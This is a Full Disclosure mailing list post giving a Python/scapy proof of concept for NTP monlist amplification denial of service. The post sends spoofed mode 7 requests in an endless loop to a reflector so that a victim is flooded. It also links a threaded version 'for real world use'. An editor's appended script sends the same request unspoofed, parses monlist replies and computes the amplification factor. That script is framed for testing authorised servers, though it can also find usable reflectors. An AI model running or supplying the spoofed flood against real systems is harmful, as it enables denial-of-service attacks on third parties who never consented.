Full Disclosure mailing list archives
A more robust POC for the ntp amplification dos
From: rai () openmailbox org
Date: Wed, 16 Jul 2014 09:20:00 +0000
Hi,

Even though the NTP amplification attacks are old, and there are plenty of scripts for checking if vulnerable (eg. the nmap NSE script ntp-mon), I had trouble finding a good example script that actually exploited the vuln as would be done in the wild. Eventually I edited a partially written script written by multiple authors. Since it is in Python and uses scapy, the key part of the exploit is as simple as:

    from scapy.all import IP, UDP, Raw, send
    ntpserver, target = "203.0.113.10", "198.51.100.5"  # placeholders: reflector, victim (spoofed source)
    data = "\x17\x00\x03\x2a" + "\x00" * 4  # mode 7, impl 3 (XNTPD), request 42 (MON_GETLIST_1)
    ...
    packet = IP(dst=ntpserver, src=target)/UDP(sport=48947, dport=123)/Raw(load=data)
    send(packet, loop=1)

For real world use, just add some boilerplate threading to taste: http://maker.fea.st/ntpamp.py

-- 
rai

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
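The check that belongs with this post, added here as an editor's example (it is not code from the post or from the linked ntpamp.py): it builds the same 8-byte mode 7 MON_GETLIST_1 request, decodes the mode 7 reply header and the 72-byte monitor records (struct info_monitor_1 in ntpd's ntp_request.h) that a vulnerable server returns, and works out the bandwidth amplification as reply bytes divided by request bytes. probe() sends the request unspoofed, from your own address, so it only measures what a server you are authorised to test sends back; it is not exercised offline. SAMPLE_RESPONSE, _make_entry() and every address in them are constructed for the example, not captured traffic.

```python
import socket
import struct

# Same 8-byte payload as the post: byte 0x17 = version 2, mode 7 (private);
# implementation 3 (XNTPD); request code 42 (MON_GETLIST_1); err/nitems and
# mbz/size left as zero.
MONLIST_REQUEST = b"\x17\x00\x03\x2a" + b"\x00" * 4
MON_ENTRY_SIZE = 72  # sizeof(struct info_monitor_1)


def parse_mode7_header(pkt):
    """Decode the 8-byte mode 7 header (struct req_pkt / resp_pkt in ntpd)."""
    if len(pkt) < 8:
        raise ValueError("packet shorter than a mode 7 header")
    b0, b1, impl, reqcode, err_nitems, mbz_size = struct.unpack("!BBBBHH", pkt[:8])
    return {
        "response": bool(b0 & 0x80),  # R bit: set on replies
        "more": bool(b0 & 0x40),      # M bit: more reply packets follow
        "version": (b0 >> 3) & 0x07,
        "mode": b0 & 0x07,            # 7 = private / implementation specific
        "sequence": b1 & 0x7F,
        "implementation": impl,
        "request_code": reqcode,
        "error": err_nitems >> 12,    # 0 = OK (other values: monlist refused/unavailable)
        "nitems": err_nitems & 0x0FFF,
        "item_size": mbz_size & 0x0FFF,
    }


def parse_monlist(pkt):
    """Return (header, [(addr, port, count), ...]) for one monlist reply packet.

    Only the first 32 bytes of each record are decoded; the IPv6 fields that
    follow are skipped using the item_size the server advertises.
    """
    hdr = parse_mode7_header(pkt)
    if hdr["mode"] != 7 or not hdr["response"]:
        raise ValueError("not a mode 7 response")
    entries = []
    if hdr["error"] != 0:
        return hdr, entries  # server answered but refused the request
    off = 8
    for _ in range(hdr["nitems"]):
        rec = pkt[off:off + hdr["item_size"]]
        if len(rec) < 32:
            break  # truncated record
        (lasttime, firsttime, restr, count, addr, daddr, flags,
         port, mode, version) = struct.unpack("!IIIIIIIHBB", rec[:32])
        entries.append((socket.inet_ntoa(rec[16:20]), port, count))
        off += hdr["item_size"]
    return hdr, entries


def amplification_factor(request, replies):
    """Bandwidth amplification: bytes received divided by bytes sent."""
    return sum(len(r) for r in replies) / float(len(request))


def probe(host, timeout=2.0):
    """Send one unspoofed monlist request and collect replies until the server
    goes quiet. Only use against servers you are authorised to test: a
    vulnerable ntpd answers a single 8-byte request with up to 100 packets."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    replies = []
    try:
        s.sendto(MONLIST_REQUEST, (host, 123))
        while True:
            data, _ = s.recvfrom(65535)
            replies.append(data)
    except socket.timeout:
        pass
    finally:
        s.close()
    return replies


def _make_entry(addr, port, count):
    """Construct one 72-byte info_monitor_1 record (sample data, not captured)."""
    return (struct.pack("!IIII", 1, 2, 0, count) + socket.inet_aton(addr)
            + socket.inet_aton("198.51.100.10") + struct.pack("!IHBB", 0, port, 3, 4)
            + struct.pack("!II", 0, 0) + b"\x00" * 32)


# Constructed sample: one full 440-byte reply (8-byte header + 6 records), the
# per-packet size a real ntpd sends, with the R and M bits set (0xd7).
SAMPLE_RESPONSE = (b"\xd7\x00\x03\x2a" + struct.pack("!HH", 6, MON_ENTRY_SIZE)
                   + b"".join(_make_entry("192.0.2.%d" % i, 123, i) for i in range(1, 7)))

if __name__ == "__main__":
    import sys
    replies = probe(sys.argv[1]) if len(sys.argv) > 1 else [SAMPLE_RESPONSE]
    for r in replies:
        hdr, entries = parse_monlist(r)
        print("error=%d nitems=%d more=%s" % (hdr["error"], hdr["nitems"], hdr["more"]))
        for addr, port, count in entries:
            print("  %s:%d count=%d" % (addr, port, count))
    print("amplification: %.1fx" % amplification_factor(MONLIST_REQUEST, replies))
```

Run it with a host argument to probe a server you own; without one it decodes the constructed sample, which shows the 55x per-packet ratio (440/8) that makes the spoofed request in the post effective, and why a server that returns error != 0 or no mode 7 reply at all is not usable as a reflector.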